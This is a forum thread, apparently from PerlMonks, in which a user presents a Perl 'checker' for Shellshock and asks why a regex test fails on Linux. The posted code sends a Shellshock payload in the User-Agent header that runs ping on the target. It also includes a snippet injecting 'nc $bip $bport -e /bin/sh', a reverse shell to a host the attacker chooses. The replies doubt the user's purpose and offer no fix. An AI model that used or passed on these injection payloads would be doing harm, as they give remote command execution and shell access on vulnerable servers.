Beefy Boxes and Bandwidth Generously Provided by pair Networks
Think about Loose Coupling

Raw HTTP Request / Response

by Ghosty (Novice)
on Aug 24, 2018 at 04:25 UTC ( #1220981=perlquestion: print w/replies, xml ) Need Help??
Ghosty has asked for the wisdom of the Perl Monks concerning the following question:

Well shit, so i'm doing a tool that checks a site for dangerous http responce, as in shellshock attacks etc but whenever i try to make it so i get a raw http responce it does get me the content but it doesn't goddamm show the rest of the content so like Example of what i get:

HTTP/1.1 200 OK Date: Fri, 24 Aug 2018 04:11:14 GMT Server: Apache/2.2.21 (Unix) DAV/2 Last-Modified: Thu, 25 Sep 2014 09:56:50 GMT ETag: "1ebf-6a8-503e0d1bdfc80" Accept-Ranges: bytes Content-Length: 1704 Connection: close Content-Type: text/html X-Pad: avoid browser bug

What i should get:

HTTP/1.1 200 OK Date: Fri, 24 Aug 2018 03:42:08 GMT Server: Apache/2.2.21 (Unix) DAV/2 PING ( 56 data bytes 64 bytes from seq=0 ttl=115 time=56.815 ms, seq=1 ttl=115 tim +e=55.693 ms, seq=2 ttl=115 time=59.925 ms Connection: close Content-Type: text/plain Content-Length: 139 --- ping statistics --- 3 packets transmitted, 3 packets received, 0% packet loss round-trip min/avg/max = 55.693/57.477/59.925 ms

That user-agent i used it to test if the server is vulnerable to shellshock and then alert the user, the thing is... i don't get what i'm suppose to get.... So how did i get the second one? I used BurpSuite and tool that acts like a http proxy etc... But yeah can anyone please help me?

Replies are listed 'Best First'.
Re: Raw HTTP Request / Response
by roboticus (Chancellor) on Aug 24, 2018 at 04:31 UTC


    You're not showing any code, so I can't offer any suggestions. However, looking at the results you're offering: Why would you expect to see the results of a command-line ping in a raw HTTP Request/Response transaction? I'd only expect to see something like that if (a) the server was vulnerable, and (b) the payload was an evil ping command.


    When your only tool is a hammer, all problems look like your thumb.

      $ua = new LWP::UserAgent; $ua->agent("$Inject; nc $bip $bport -e /bin/sh'"); $request = HTTP::Request->new('GET'); $request->url($url); $response = $ua->request($request); $code = $response->code; $headers = $response->headers_as_string; $body = $response->content;

      I found that code which works fine on windows and the problem is on Unix it doesn't follow the =~ thingy Ok here:

      sub PingInject{ $url = "$target"; $ua = new LWP::UserAgent; $ua->agent("() { :;}; /bin/bash -c 'ping -c 3'"); $ua->timeout(15); $request = HTTP::Request->new('GET'); $request->url($url); $response = $ua->request($request); $code = $response->code; $headers = $response->headers_as_string; $body = $response->content; if($body =~ /--- ping statistics ---/){ print "[+] Shellshock Ping Injection was injected successfully! (Vul +nerable!) \n"; $injectionFound = "yes"; $InjectPoint = "() { :;}; /bin/bash -c 'ping -c 3'"; $Inject = "() { :;}; /bin/bash -c 'ping -c 3"; InjCorrect(); } else { print "[-] Shellshock Ping Injection was not injected successfully! +(Not Vulnerable!) \n"; } }

      At the part where it says "=~ /--- ping statistics ---/" on windows it does follow that statement but not on linux it just says the else statement... So any ideas on how to fix that?

        So any ideas on how to fix that?

        You don't "fix" that - it's an arbitrary command injection which your Linux installation correctly prohibits.

Log In?

What's my password?
Create A New User
Node Status?
node history
Node Type: perlquestion [id://1220981]
Approved by marto
and the web crawler heard nothing...

How do I use this? | Other CB clients
Other Users?
Others cooling their heels in the Monastery: (3)
As of 2019-04-20 07:01 GMT
Find Nodes?
    Voting Booth?
    I am most likely to install a new module from CPAN if:

    Results (108 votes). Check out past polls.

    • (Sep 10, 2018 at 22:53 UTC) Welcome new users!